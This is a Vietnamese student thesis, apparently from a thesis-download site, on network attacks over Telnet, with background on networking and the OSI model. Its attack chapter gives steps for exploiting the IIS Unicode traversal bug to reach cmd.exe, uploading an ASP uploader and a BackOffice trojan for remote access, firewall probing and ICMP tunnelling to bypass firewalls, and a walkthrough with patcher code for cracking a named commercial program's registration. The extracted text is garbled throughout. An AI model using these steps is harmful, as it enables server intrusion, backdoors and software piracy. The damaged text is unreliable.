Luận văn Nghiên cứu xây dựng vài chương trình cơng mạng Internet qua giao thức Telnet -1- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com MỞ ĐẦU Với phát triển mạnh mẽ công nghệ thông tin, đặc biệt xuất mạng máy tính tồn cầu Internet làm thay đổi phương thức khai thác máy tính cổ điển Mạng cơng nghệ mạng đời cách không lâu triển khai ứng dụng hầu hết khắp nơi giới Bên cạnh thành tựu ấy, mạng máy tính lại nảy sinh vấn đề mang tính tiêu cực trở thành mối lo ngại cho người sử dụng tham gia vào mạng máy tính tồn cầu Thế giới tội phạm triệt để tận dụng thành tựu này, loại tội phạm xuất hiện: “tin tặc”, “tội phạm công nghệ cao” Ngày nay, loại tội phạm máy tính ngày có xu hướng gia tăng số lượng tính chất nguy hiểm Ngay quan đặc biệt nước sử dụng Internet phương tiện liên lạc để đa dạng hố thủ đoạn hoạt động Trong lực lượng cơng an, việc ứng dụng thành tựu công nghệ thông tin vào hoạt động lực lượng nâng cao hiệu cơng vệc, góp phần đấu tranh phịng chống loại tội phạm, giữ vững trật tự an tồn xã hội Hiện nay, ngành có nhiều hệ thống máy tính kết nối với mạng Internet Đó thực khó khăn với người quản trị hệ thống, lực lượng cơng an u cầu bảo mật thơng tin ln ln đặt lên hàng đầu Tình hình địi hỏi lực lượng cơng an phải gấp rút ứng dụng công nghệ mới, nghiên cứu biện pháp bảo mật thông tin biện pháp nhằm “phá hoại” thông tin đối tượng số trường hợp cụ thể nhằm đáp ứng yêu cầu nghiệp vụ ngành Bên cạnh đó, phải nghiên cứu cách có hệ thống phương thức cơng mạng để giúp lực lượng trinh sát kỹ thuật thu thập thơng tin cách bí mật -2- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Tôi xin đăng ký đề tài khóa luận tốt nghiệp là: “Nghiên cứu xây dựng vài chương trình cơng mạng Internet qua giao thức Telnet.” Xuất phát từ yêu cầu thực tiễn nói trên, nội dung khóa luận giúp cho người sử dụng có kiến thức phương thức công mạng, sở xây dựng số chương trình “tấn công” qua giao thức Telnet(đây giao thức ứng dung khoá luận) Đồng thời, khoá luận đề xuất số giải pháp bảo mật cho hệ thống tham gia mạng Internet Để đạt mục đích nói trên, ngồi phần mục lục, lời nói đầu kết luận, khoá luận chia làm chương sau:  Chương I: Tổng quan mạng Internet giao thức Telnet Ở chương này, khoá luận tập trung trình bày giao thức Internet, tập trung vào giao thức Telnet giao thức ứng dụng khoá luận  Chương II: Một số giải pháp bảo mật thông tin mạng Mục đích chương II nhằm nghiên cứu nguy gây gây an ninh mạng, sở đề xuất số giải pháp bảo mật thơng tin cho hệ thống máy tính mạng  Chương III: Xây dựng số chương trình công qua giao thức Telnet Trên sở vấn đề nghiên cứu trên, khoá luận đưa số chương trình cơng qua thư điện tử, xâm nhập Web, Crack phần mềm số kỹ thuật quét tường lửa -3- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com CHƯƠNG I TỔNG QUAN VỀ MẠNG INTERNET VÀ GIAO THỨC TELNET 1.1 Giới thiệu mạng máy tính tồn cầu Internet 1.1.1 Mạng máy tính Mạng máy tính hệ thống máy tính độc lập kết nối với Hai máy tính gọi kết nối với chúng có khả trao đổi thơng tin Sự kết nối thơng qua dây dẫn, tia Laser, sóng điện từ hay vệ tinh viễn thông Việc kết nối máy tính có ưu điểm sau đây: - Sử dụng chung tài nguyên: Dữ liệu, chương trình thiết bị dùng chung người dùng từ máy tính mạng - Tăng độ tin cậy hệ thống thơng tin: Nếu máy tính hay đơn vị liệu bị hỏng ln sử dụng máy tính khác hay khác liệu, nhờ đó, khả mạng bị ngừng sử dụng giảm thiểu - Tạo môi trường truyền thông mạnh nhiều người sử dụng phạm vi địa lý rộng: Mục tiêu ngày trở nên quan trọng mạng máy tính phát triển phạm vi tồn cầu ngày - Tiết kiệm chi phí: Do tài nguyên dùng chung, hệ thống tin cậy phí thiết bị bảo dưỡng mạng máy tính thấp so với trường hợp máy tính riêng lẻ Liên mạng máy tính (Internetworking hay Internet) công nghệ đưa nhằm kết nối mạng thành thể thống Công nghệ Internet che dấu kiến trúc vật lý mạng cho phép máy tính truyền thơng -4- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com cách độc lập với liên kết vật lý mạng Một liên mạng quen thuộc với mạng Internet 1.1.2 Mạng Internet Internet tổ hợp hàng triệu máy kết nối với thông qua giao thức TCP/IP để chia sẻ thơng tin với nhau, có đủ loại máy tính, chúng sử dụng nhiều hệ điều hành khác nhau.Thông tin Internet gồm đủ loại từ thư điện tử (Email), File đồ hoạ đến Video cịn nhiều thơng tin khác cung cấp người sử dụng Internet Những máy chủ (Host) mạnh thường sử dụng hệ điều hành đa nhiệm, ví dụ UNIX, để người sử dụng kết nối vào Những máy chủ định vị điểm thư viện, trường đại học, tổ chức, đại lý, cơng ty tồn giới Những máy chủ kết nối với qua đường điện thoại khoảng 640/1000 giây để bắt đầu nhận thông báo từ Bắc Mỹ tới Nam cực 1.1.2.1 Các dịch vụ mức ứng dụng ban đầu Internet - Thư điện tử (Electronic mail) Cho phép người dùng ngồi trước máy tính nhà gửi E-mail tới đâu giới họ có địa E-mail Họ tham gia nhóm thảo luận (Discussion group) đề tài khác hay bắt đầu nhóm chủ đề mà họ ưa thích - Truyền file (File Transfer) Nếu cần chương trình phần mềm tiện ích nén file, chương trình diệt virus, phần mềm trị chơi, hình ảnh hay âm thanh, người dùng tải xuống lúc với File Transfer -5- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com - Truy nhập từ xa (Remote login) Có lẽ điều thú vị ứng dụng Internet Remote login, cho phép người dùng kết nối vào máy tính xa trạm cuối để sử dụng máy tính 1.1.2.2 Dịch vụ mức mạng Internet Một lập trình viên viết chương trình ứng dụng Internet cần có nhìn khác với người đơn giản sử dụng dịch vụ Internet Ở tầng mạng, Internet cung cấp kiểu dịch vụ mà ứng dụng Internet thường dùng là: - Dịch vụ truyền khơng kết nối (Connectionless Paket Delivery Service) phương thức truyền liệu mà mạng chuyển mạch gói cung cấp Điều đơn giản mạng Internet chuyển gói tin từ máy sang máy khác dựa vào thông tin địa gói đến đích Việc chia nhỏ gói tin truyền có ưu điểm đường bị bận bị đứt, gói truyền theo đường khác - Dịch vụ truyền tin cậy (Reliable Stream Transport Service) Phần lớn ứng dụng đòi hỏi nhiều dịch vụ truyền thơng khơng kết nối chúng cần tự động sửa lỗi, kiểm tra tính tồn vẹn thông tin truyền mạng 1.1.3 Giao thức truyền thơng mơ hình tham chiếu OSI 1.1.3.1 Giao thức truyền thơng Các máy tính mạng trao đổi thông tin với thông qua phần mềm làm việc theo chuẩn Giao thức truyền thơng (Protocol) tập hợp quy tắc quy định phương thức truyền nhận thông tin máy tính mạng Các mạng máy tính đại thiết kế cách phân chia cấu trúc mức độ cao nhằm làm giảm phức tạp thiết kế Các giao thức mạng thường -6- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com chia làm tầng (Layer), tầng xây để dựng dựa dịch vụ tầng cung cấp dịch vụ cho tầng cao 1.1.3.2 Mô hình tham chiếu OSI(Open Systems Interconect Referent model) Mơ hình mạng máy tính tổ chức tiêu chuẩn hố quốc tế (International Standard Organization - ISO) đưa năm 1983 gọi mơ hình tham chiếu hệ thống mở (Open Systems Interconect referent model - OSI) Mơ hình tham chiếu OSI chứa tầng mô tả chức giao thức truyền thơng Mỗi tầng mơ hình OSI miêu tả chức thực liệu di chuyển ứng dụng mạng Application Virtual Communication Application Presentation Presentation Session Session Transport Transport Network Network Data Link Data Link Physical Physical Hình Mơ hình tham chiếu OSI -7- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Các lớp giao thức xếp chồng lớp lớp Chính xuất nó, cấu trúc thường gọi Stack giao thức xếp chồng Hai hệ thống khác truyền thơng với chúng bảo đảm nguyên tắc chung (cài đặt giao thức truyền thông) Các chức tổ chức thành tập tầng đồng mức cung cấp chức Các tầng đồng mức phải sử dụng giao thức chung Một tầng không định nghĩa giao thức đơn, định nghĩa chức truyền thơng thi hành số giao thức Do vậy, tầng chứa nhiều giao thức, giao thức cung cấp dịch vụ phù hợp cho chức tầng Ví dụ giao thức truyền file (File Transfer Protocol - FTP) giao thức thư điện tử (Simple Mail Transfer Protocol - SMTP) cung cấp dịch vụ cho người dùng hai thuộc tầng ứng dụng Mỗi mức ngang hàng giao thức truyền thông (sự bổ xung giao thức mức tương đương hệ thống khác) Mỗi mức phải chuẩn hoá để giao tiếp với mức tương đương với Trên lý thuyết, giao thức biết đến liên quan tới lớp mà khơng quan tâm tới mức Tuy nhiên phải có thoả thuận để chuyển liệu tầng máy tính, tầng lại liên quan tới việc gửi liệu từ ứng dụng tới ứng dụng tương đương máy khác Tầng cao dựa vào tầng thấp để chuyển liệu qua mạng phía Dữ liệu chuyển xuống ngăn xếp từ tầng xuống tầng thấp truyền qua mạng nhờ giao thức tầng vật lý Ở đầu nhận, liệu lên ngăn xếp tới ứng dụng nhận Những tầng riêng lẻ khơng cần biết tầng xử lý sao, cần biết cách chuyển nhận thơng tin từ tầng Sự lập hàm truyền thông tầng khác giảm thiểu tích hợp cơng nghệ đầu vào giao thức Các ứng dụng thêm vào mà không cần thay đổi tầng vật lý mạng, phần cứng bổ sung mà khơng cần viết lại phần mềm ứng dụng -8- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Tầng vật lý (Physical layer) - Tầng vật lý liên quan tới việc truyền dịng bit máy kênh truyền thơng vật lý, đây, cấu trúc liệu không quan tâm đến - Việc thiết kế tầng vật lý cần quan tâm đến vấn đề ghép nối khí, điện tử, thủ tục mơi trường truyền tin bên nó, ví dụ mức điện áp tương ứng với bit - 1, thời gian tồn xung Tầng liên kết liệu (Data link layer) - Liên kết, thiết lập, trì, huỷ bỏ liên kết liệu nhiệm vụ tầng liên kết liệu - Ngoài tầng liên kết liệu cịn kiểm sốt lỗi đường truyền, thơng lượng Tầng thực việc đóng gói thơng tin gửi thành frame, gửi frame cách mạng, xử lý thông báo xác nhận (Acknowledgement frame) bên nhận gửi Xác định ranh giới frame cách ghi số byte đặc biệt vào đầu cuối frame Giải vấn đề thông lượng truyền bên gửi bên nhận (Vấn đề giải số lớp trên) Tầng mạng (Network layer) - Vấn đề chủ chốt tầng mạng routing (dẫn đường), định rõ gói tin (packet) truyền theo đường từ nguồn đến đích Các đường cố định, bị thay đổi, thiết lập bắt đầu liên kết hay động (dynamic) thay đổi tuỳ theo trạng thái tải mạng - Nếu có nhiều gói tin truyền mạng xảy tình trạng tắc nghẽn, tầng mạng phải giải vấn đề - Thực chức giao tiếp với mạng bao gồm việc đánh lại địa chỉ, cắt hợp gói tin cho phù hợp với mạng -9- LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Ngồi tầng mạng cịn thực số chức kế tốn, ví dụ, số Firewall (Packet Filtering) cài đặt tầng để thống kê số lượng gói tin truyền qua mạng hay ngăn cấm cho phép gói tin giao thức Tầng giao vận (Transport layer) - Kiểm sốt việc truyền tin từ nút tới nút (end-to-end): Bắt đầu từ tầng này, thực thể nói chuyện cách logic với - Thực hiên việc ghép kênh phân kênh: Mỗi ứng dụng gửi liệu theo nhiều đường, đường truyền lại nhiều ứng dụng sử dụng, phân kênh/hợp kênh giải vấn đề phân chia liệu cho ứng dụng - Khắc phục sai sót q trình truyền tin: Việc khắc phục sai sót thực nhiều tầng khác nhau, hiệu tầng cao, việc khắc phục sai sót thực tầng giao vận hợp lý Tầng phiên (Session layer) - Tầng cho phép người sử dụng máy khác thiết lập, trì, huỷ bỏ, đồng phiên truyền thơng họ Cung cấp số dịch vụ hữu ích cho người sử dụng cho phép người dùng logon vào hệ thống chia sẻ thời gian, truyền tệp máy tính - Quản lý thẻ (Token): chế thẻ tầng phiên cung cấp để tránh tượng tranh chấp đường truyền mạng - Thực đồng (Synchronization): thực liệu lớn cách thêm vào thông tin kiểm tra, sửa lỗi Tầng trình diễn (Presentation layer) - Giải vấn đề liên quan tới cú pháp ngữ nghĩa thông tin chuyển đổi thông tin theo chuẩn hai bên sử dụng (mã ASCII - EDBCDIC) - 10 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Đối với trang Web giới thiệu, quảng cáo việc đặt quyền truy cập khơng cần thiết khơng có ý nghĩa Nhưng với trang Web có mục đích kinh doanh, trị ngành ta có đưa số liệu quan trọng thơng qua dịch vụ Web yếu tố bảo mật thông tin yếu tố sống cịn kinh doanh cơng tác ngành Ví dụ 1: Để kiểm tra địa chỉ: www.tnh.com.vn ta thực lệnh Telnet www.tnh.com.vn Kết sau: HTTP/1.1 400 Bad Request Server: Microsoft-IIS/4.0 Date: Wed, 15 May 2004 06:52:31 GMT Content-Type: text/html Content-Length: 87 ErrorThe parameter is incorrect Connection to host lost Dòng 1: Phiên Http Service : HTTP/1.1 (có PHP/4.0) Đây mã trạng thái Html Dòng 2: Http Server Microsoft – IIS/4.0 Dòng 3: Ngày GMT Dòng 4: Phân loại nội dung Dòng 5: Chiều dài ký tự Ví dụ 2: C:\> telnet www.astalavista.box.sk 80 GET / HTTP/1.1 - 62 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com HTTP/1.1 400 Bad Request Date: Wed, 15 May 2004 06:51:37 GMT Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 Từ đây, ta thấy http://www.astalavista.box.sk chạy Apache V1.3.19 Unix với PHP V4.0 Sau thí dụ xâm nhập vào trang Web Theo thống kê Microsoft có khoảng 13 triệu Internet dùng IIS Server sản phẩm MS Version IIS Server có lỗi nghiêm trọng lỗi UNICODE(Unicode Bug) Tất nhiên MS đưa Patch sửa lỗi số 13 triệu Website cịn có Website chưa sửa lỗi Sau nhận thông báo Server Website, ta thực bước sau Bước 1: Về công cụ, bạn phải cài Perl máy(Có thể dùng Active Perl 522 download http://www.softseek.com) File Unicode Bước 2: Sau cài đặt xong Perl, thực lệnh: Perl Unicode.pl www.Địa website.com : 80 Câu lệnh tìm Bug IIS, có 20 Bug UNICODE IIS Khi câu lệnh Scan Bug cần tìm ta cần đưa Bug vào dịng lệnh: Telnet://www.Địa trang Web.com/Bug Ví dụ địa http://www.iwss.net sau Scan ta thực câu lệnh sau: Telnet://www.iwss.net/cgibin %c0af %c0%af %c0%af c0%af% c0%af /winnt/system 32/cmd.exe?/c+ - 63 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Như vào Server, bạn thực lệnh thông thường DOS để làm việc mà bạn mong muốn: mở thư mục, đổi tên thư mục, xem file, xoá file,… Bước 3: Điều quan trọng bạn phải đưa trang Web vào đó, bạn cần file: cgiecoderloader.pl, upload.asp, upload.in để đưa vào thư mục C:\inetpub\wwwroot Sau hoàn thành từ Browser bạn Upload bạn muốn(Telnet://www.địa trang WEB.com/upload.asp), ta Upload Trorjan Backoffice để mở cổng để sau bạn Remote Access 3.3.4 Một số kỹ thuật quét tường lửa (Firewall) 3.3.4.1 Khái niệm Firewall Song song với giải pháp đảm bảo an ninh cho mạng máy tính giải pháp phần cứng giải pháp người tường lửa giải pháp phần mềm giải vấn đề hiệu Trên thực tế giải pháp phổ biến nhất, kiểm soát hiệu kết nối, trao đổi thông tin mạng Bức tường lửa bao gồm máy tính thiết bị phần cứng chun dụng, có nhiệm vụ kiểm sốt kết nối mà q trình trao đổi thơng tin hệ thống mạng cần bảo vệ (mạng bên trong) với mạng coi khơng an tồn (mạng bên ngoài- thường Internet mạng coi khơng an tồn bảo mật) Bức tường lửa hệ thống thiết bị, kết nối thành mạng trung gian hai mạng Tuy nhiên, nhiệm vụ hệ thống không thay đổi, thực nhiệm vụ kiểm sốt truy nhập thơng tin mạng bên mạng bên ngồi Khi khơng người sử dụng tải trực tiếp thơng tin, mà họ phải tải tường lửa từ tải máy trạm Một tường lửa không đảm bảo an - 64 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com toàn cho hoạt động bình thường hệ thống mạng, mà cịn đóng vai trị quan trọng giải pháp quản lý đáng tin cậy Phân loại tường lửa: - Bức tường lửa lọc gói tin (Filtering Firewall): gọi tường lửa mức mạng Các tường lửa loại làm việc mức mạng Dữ liệu phép rời hệ thống luật tường lửa cho phép Bức tường lửa thực việc kiểm tra mức gói tin giao thức mạng để kiểm sốt lưu thơng qua chúng Các định dựa thông tin thu phần đầu (header) gói tin như: số hiệu cổng dịch vụ, địa nguồn, địa đích, loại dịch vụ,… - Máy chủ ủy quyền(Proxy Server): Bức tường lửa loại có nhiệm vụ tạo kiểm soát kết nối cho người sử dụng Nó bao gồm hai loại sau: + Ứng dụng uỷ quyền(Application Proxy): tường lửa mức ứng dụng Các tường lửa mức ứng dụng chạy dịch vụ uỷ quyền, lưu thơng hướng ngoại có nguồn gốc từ tường lửa từ trạm nội Bởi tường lửa quản lý tất kết nối nên chúng thực việc ghi nhật ký hệ thống kiểm tra lưu thông truyền qua chúng + SOCKS uỷ quyền: Một máy chủ SOCKS giống SWITCH chuyển mạch cũ Nố đơn giản kiểm soát kết nối hệ thống bên bên ngồi Giống FireWall lọc, chúng khơng cung cấp khả xác thực người sử dụng Tuy nhiên chúng ghi nhật ký kết nối người sử dụng 3.3.4.2 Một số kỹ thuật quét tường lửa 3.3.4.2.1 Kỹ thuật rà tuyến đường - 65 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Một phương pháp để tìm tường lửa mạng hiệu dùng Traceroute Bạn dùng traceroute UNIX tracert.exe NT để tìm chặng dọc trên đường truyền đến đích tiến hành suy diễn Traceroute Linux, thực rà đường cách gửi gói tin ICMP, trái với kỹ thuật gói tin UDP ngầm định [ sm@atsunami sm] $ traceroute - I www.yourcompany.com traceroute to www.yourcompany.com ( 172.17.100.2 ) , 30 hops max, 140 byte packets attack-gw ( 192.168.50.21) 5.801 ms 5.105 ms 5.445 ms gw1.smallisp.net ( 192.168.51.l) gw2.smallisp.net ( 192.168.52.2) 13 hssi.bigisp.net ( 10.55.201.2 ) 14 seriall.bigisp.net ( 10.55.202.l) 15 www.yourcompany.com ( 172.29.11.2) Từ thơng số trên, xác định (10.55.202.1) tường lửa Nếu định tuyến bạn hệ phục vụ đích đáp ứng gói tin có TTL hết hạn Tuy nhiên, số định tuyến tường lửa xác lập để khơng trả gói tin ICMP lẫn UDP Trong trường hợp này, suy diễn không chắn Do đó, thực traceroute xem chặng đáp ứng cuối cùng, suy tường lửa định tuyến đường truyền bắt đầu phong tỏa tính tracerouting Ví dụ, ICMP bị phong tỏa đến đích nó, khơng có đáp ứng từ định tuyến vượt client - gw.smallisp.net : stoneface (192.168.10.33) 12.640 ms 8.367 ms gw1.localisp.net (172.31.10.1) 214.582 ms 197.992 ms gw2.localisp.net (172.31.10.2) 206.627 ms 38.931 ms dsl.localisp.net (172.31.12.254) 47.167 ms 52.640 ms 14 ATM6.LAX2.BIGISP.NET (10.50.2.1) 250.030 ms 391.716 ms - 66 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 15 ATM7.SDG.BIGISP.NET (10.50.2.5) 234.668 ms 384.525 ms 16 client-gw.smallisp.net (10.50.3.250) 244.065 ms ! X * * 17 * * * 18 * * * 3.3.4.2.2 Kỹ thuật nắm giữ biểu ngữ Kỹ thuật quét tìm cổng tường lửa hữu ích việc định vị tường lửa, hầu hết tường lửa không chờ cổng ngầm định, việc phát phải suy diễn Nhiều tường lửa phổ dụng công bố diện chúng cách đơn giản nối với chúng Ví dụ, nhiều tường lửa cơng bố chức chúng với vai trị tường lửa, số quảng cáo kiểu phiên chúng Ví dụ, ta nối với máy tin tường lửa Telnet cổng 21 (FTP ), ta thấy thông tin sau: Telnet 192.168.51.129 2l [UNKNOWN] [ 192.168.5l.129 ] l ( ? ) open 220 Secure Gateway FTP server ready Thông tin "Secure Gateway server FTP ready" dấu hiệu tường lửa Việc nối thêm với cổng 23 (telnet) xác nhận tên tường lửa "Eagle." Telnet 192.168.51.129 23 [UNKNOWN] [ 192.168.5l.129 ] 23 ( ? ) open Eagle Secure Gateway Hostname : Cuối để xác định máy có phải tường lửa khơng ta Telnet với cổng 25 ( SMTP ), báo cho ta biết gì: Telnet 192.168.51.129 25 [UNKNOWN] [ 192.168.5l.129 ] 25 ( ? ) open 421 fw3.acme.com Sorry, the firewall does not provide mail service to you 3.3.4.2.3 Kỹ thuật quét tường lửa - 67 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com  Sử dụng Hping Hping công cụ làm việc cách gửi gói tin TCP đến cổng đích báo cáo gói tin mà nhận trở lại Hping trả nhiều đáp ứng khác tùy theo vơ số điều kiện Mỗi gói tin phần tồn thể cung cấp thơng tin rõ kiểu kiểm sốt truy cập tường lửa (Download địa chỉ:www.Genocide2600.com/-tattooman/scanner/hping066) Khi dùng Hping ta phát gói tin mở, bị phong tỏa, thả, loại bỏ Trong ví dụ sau đây, hping thông báo cổng 80 mở sẵn sàng nhận kết nối Ta biết điều nhận gói tin với cờ SA ấn định (một gói tin SYN/ACK) [ root@bldg_043 / opt ] # hping www.yourcompany.com -c2 - S -p80 -n HPING www.yourcomapany.com ( eth0 172.30.1.2 ) : S set, 40 data bytes 60 bytes from 172.30.1.20 : flags=SA seq=0 ttl=242 id= 65121 win= 64240 time=144.4 ms Như vậy, ta biết có cống mở thơng đến đích, chưa biết địa tường lửa Trong ví dụ kế tiếp, hping báo cáo nhận ICMP unreachable type 13 từ 192.168.70.2 ICMP type 13 gói tin lọc bị ICMP admin ngăn cấm, thường gửi từ định tuyến lọc gói tin [root@bldg_043 /opt ] # hping www.yourcompany.com -c2 -S -p23 -n HPING www.yourcompany.com ( eth0 172.30.1.20 ) : S set, 40 data bytes ICMP Unreachable type 13 f rom 192.168.70.2 Như sau thực công việc trên, ta xác định 192.168.70.2 chắn tường lửa, ta biết phong tỏa cổng 23 đến đích ta  Sử dụng cầu lửa(FireWalk) - 68 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Firewalk (Download http://www.packetfactory.net/firewalk/) công cụ nhỏ tiện dụng, quét cổng, dùng để phát cổng mở đằng sau tường lửa Firewalk làm việc cách kiến tạo gói tin với IP TTL tính tốn để kết thúc chặng vượt tường lửa Về lý thuyết, gói tin tường lửa cho phép, phép qua kết thúc dự kiến, suy thông điệp "ICMP TTL expired in transit." Mặt khác, gói tin bị ACL tường lửa phong tỏa, bị thả, khơng có đáp ứng gửi trả lại, gói tin lọc bị ICMP type 13 admin ngăn cấm gửi [ root@exposed / root ] # firewalk -pTCP -S135 -140 10.22.3.1 192.168.1.1 Ramping up hopcounts to binding host probe : TTL : port 33434 : expired from [exposed.acme.com] probe : TTL : port 33434 : expired from [rtr.isp.net] probe : TTL : port 33434 : Bound scan at hops [rtr.isp.net] port open port 136 : open port 137 : open port 138 : open port 139 : * port 140 : open Điểm ý sử dụng Firewalk dự đốn, số tường lửa phát gói tin hết hạn trớc kiểm tra ACL gửi trả gói tin ICMP TTL EXPIRED Kết là, Firewalk mặc nhận tất cổng mở 3.3.4.2.4 Kỹ thuật phân luồng ICMP UDP Phân luồng (tunneling) ICMP khả đóng khung liệu thực phần đầu ICMP Nhiều định tuyến tường lửa cho phép ICMP - 69 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com ECHO, ICMP ECHO REPLY, gói tin UDP dễ dàng qua, dễ bị xâm phạm trước kiểu công Cũng chỗ yếu Checkpoint, DNS, kiểu công phân luồng ICMP UDP dựa hệ thống bị xâm phạm đằng sau tường lửa Nếu chạy công cụ hệ phục vụ lokid hệ thống đằng sau tường lửa cho phép ICMP ECHO ECHO REPLY, bạn cho phép kẻ công chạy công cụ hệ khách (lokid), đóng khung lệnh gửi gói tin ICMP ECHO đến hệ phục vụ (lokid) Cơng cụ lokid tháo lệnh, chạy lệnh cục , đóng khung kết xuất lệnh gói tin ICMP ECHO REPLY trả lại cho bọn công Dùng kỹ thuật này, kẻ công hồn tồn bỏ qua tường lửa 3.3.5 Chương trình Crack phần mềm 3.3.5.1 Khái niệm Crack Các nhà sản xuất phần mềm để đảm bảo quyền cho phần mềm yêu cầu người sử dụng phải đăng ký với nhà sản xuất sử dụng phần mềm họ Mọi phần mềm có phần đăng ký nhà sản xuất đưa để người sử dụng đăng ký Tuy nhiên, người sử dụng đăng ký với nhà sản xuất dẫn đến xuất việc sử dụng phần mềm bất hợp pháp Để làm điều người sử dụng phải thực Crack phần mềm Đó việc người sử dụng gỡ bỏ phần đăng ký bắt buộc chương trình phần mềm để sử dụng phần mềm mà không cần mua quyền nhà sản xuất 3.3.5.2 Các bước để thực Crack Khi ta biết xác địa File Http server ta Download trực tiếp File cách Telnet đến Server qua cổng 80 Cơng cụ để sử dụng Download mạng về, là: - WinDasm 32 (cơng cụ dùng để disassembler file mã máy) - 70 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com - Hview (cơng cụ dùng để sửa đổi mã nguồn chương trình) Phương pháp Crack áp dụng với khoảng 40% phần mềm Bước 1: - Chạy chương trình cần Crack - Xác định lỗi đăng ký phần mềm (có thể Incorrect Password, Wrong Serial,…) Bước 2: Dùng WinDasm 32 để mở File cần Crack, từ thông báo lỗi để xác định địa cần sửa đổi Bước 3: Dùng Hview để sửa mã nguồn phần mềm địa xác định 3.3.5.3 Crack phần mềm cụ thể Sau ví dụ việc thực Crack phần mềm cụ thể, phần mềm VietKey Office v2.1 VietKey Office v2.1 ứng dụng cụ thể giúp chuyển mã văn , kiểm tra tả, nhúng trực tiếp vào công cụ MicroSoft Word Phiên 2.1 chưa đăng ký buộc người sử dụng phải đăng ký phiên thức quyền sử dụng tiếp, thông báo đăng ký "Xin liên hệ với tác giả" Chúng ta vào Hiew, chọn file vkadd.dot(thanh Menu VKO MS Word), ấn F4 chọn Hex, Enten Sau đó, ấn F7 để tìm dịng báo đăng ký “Xin liên hệ với tác giả” Dịng thơng báo đăng ký hàm gọi MsgBox Visual Basic nên chắn trước câu lệnh rẽ nhánh điều kiện để đến hộp thoại đăng ký, ta thấy địa : 00139F7 (ở trước MsgBox vài Byte) Sau đó, ấn F4, chọn Decoder Ta thấy đoạn mã sau : - 71 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 000139CC: 7429 je 0000139F7 ====> "Nhảy" đến hộp thoại chưa đăng ký 000139CE: 810A3030 or w,[bp],[si],03030; “00” 000139D2:A831 test al,031; “1” 000139F2: 9D popf ===> Đưa hộp thoại đăng ký hình 000139F4:1420 adc al,020 000139F6: 0000 ađ [bx],[si],al 000139F8: 40 inc ax Ta biết VKO cần điều kiện chưa đăng ký để nhảy đến hộp thoại đăng ký, sửa thành lệnh nhảy không điều kiện Như vậy, bạn chưa đăng ký quyền sử dụng chương trình cách bình thường Vì vậy, ta đến địa 00139CC sửa 7429 thành EB29 Khi chạy lại VKO ta sử dụng phần mềm mà không cần đăng ký 3.3.5.4 Mã nguồn chương trình Crack 3.3.5.4.1 Chương trình Crack viết Turbo Pascal Uses CRT; Const off = $XXXXXXXX; Địa offset cần Crack Var ch: Char; Procedure crack(location: longint); Var F: File of Byte; X: Array[0 0] of Byte; Số Byte cần crack Begin - 72 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com {$I-} Assign(F,' *.exe '); Tên File cần Crack Reset(F,1); {$I+} If ((IOResult 0)and(Filesize(F)Y))then Begin Seek(F,location); X[0]:=$XX; Số Hexa cần thay đổi File cần Crack BlockWrite(F,X[0]); Close(F); End; End 3.3.5.4.2 Chương trình Crack viết Turbo C #include conio.h; #include stdio.h; #include stdlib.h; #define off 0xXXXXXXXX; Địa offset cần crack Crack(long int location) { Unsigned char x[2]; Số byte cần crack File *f1; f1=open("*.exe","r+"); File cần crack If (f1=NULL) Exit; Thốt khơng có File cần tìm Else {Fseek(f1,location,Seek_set); X[0]=0xXX; Số Hexa thay đổi thứ File crack - 73 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com X[1]=0xXX; Số Hexa thay đổi thứ hai File crack Fwrite(x,1,2,f1); Fclose(f1); } return 0; } o0o - KẾT LUẬN - 74 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Việc nghiên cứu vấn đề an ninh an toàn cho mạng máy tính ván đề lớn khó, phạm vi khố luận em đưa nhìn tổng quan giải pháp cho vấn đề Nội dung khố luận phần giới thiệu tổng quan mạng Internet chế hoạt động giao thức Telnet với mục đích phân tích nguy tiềm ẩn mà kẻ cơng lợi dụng để xâm nhập hệ thống mạng nói chung qua giao thức Telnet nói riêng, đồng thời đưa số chương trình ví dụ công mạng qua giao thức Telnet Trên sở phân tích nguy tiềm ẩn với hệ thống mạng em nghiên cứu số sỏ, giải pháp đảm bảo an ninh cho mạng Song lượng thời gian có hạn nên khơng lột tả hết vấn đề kết đạt số hạn chế Tuy vậy, việc tiếp cận nghiên cứu vấn đề an ninh an toàn mạng máy tính tạo cho thân em phương pháp nghiên cứu, vốn kiến thức quý báu Trong tương lai, điều kiện học tập cơng tác cho phép tảng để em hồn thiện khố luận đem lại hiệu thiết thực TÀI LIỆU THAM KHẢO InternetWorking với TCP/IP Tập 1,2 : Nguyễn Quốc Cường - 75 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Hệ thống Internet : Nguyễn Xuân Phong Bảo mật mạng - Bí giải pháp: Tổng hợp biên dịch VNGUIDE Hacking Exposed Windows 2000: Network Security Secrets & Solution Joel Scambray, Stuart McClure Hacking Exposed:Network Security Secrets & Solution Second Edition Network and Internet Security Principles and Practice William Stallings - 76 - LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com ... là: ? ?Nghiên cứu xây dựng vài chương trình cơng mạng Internet qua giao thức Telnet. ” Xuất phát từ yêu cầu thực tiễn nói trên, nội dung khóa luận giúp cho người sử dụng có kiến thức phương thức công. .. thơng tin cho hệ thống máy tính mạng  Chương III: 